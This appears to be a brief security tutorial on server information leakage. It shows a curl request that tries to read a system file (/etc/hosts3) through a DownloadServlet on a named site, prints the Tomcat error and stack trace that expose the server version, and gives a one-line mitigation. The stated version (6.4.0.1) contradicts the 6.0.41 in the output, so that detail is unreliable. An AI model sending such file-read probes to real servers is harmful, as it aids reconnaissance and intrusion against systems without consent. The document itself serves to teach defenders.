Tweet

Information Leakage

In this type of attack, a remote hacker try to reveal the server information like server name,version number etc so that the remote attacker can check the vulnerabily of the exposed server in tehe CVE database and try to perform thoose attack

//This command will reveal the server information

curl 'http://zariga.com/DownloadServlet' --data 'filename=%2F/etc/hosts3'

The above command has exposed the server is running on Tomcat 6.4.0.1

Apache Tomcat/6.0.41 - Error report 

HTTP Status 500 - /etc/hosts3 (No such file or directory)


type Exception report

message /etc/hosts3 (No such file or directory)

description The server encountered an internal error that prevented it from fulfilling this request.

exception

java.io.FileNotFoundException: /etc/hosts3 (No such file or directory)
	java.io.FileInputStream.open(Native Method)
	java.io.FileInputStream.<init>(FileInputStream.java:146)
	java.io.FileInputStream.<init>(FileInputStream.java:101)
	com.servlet.DownloadServlet.doPost(DownloadServlet.java:45)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:643)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:723)

note The full stack trace of the root cause is available in the Apache Tomcat/6.0.41 logs.


Apache Tomcat/6.0.41


Mitigation : Hide the server information, from error,HTTP header, or display the partial Information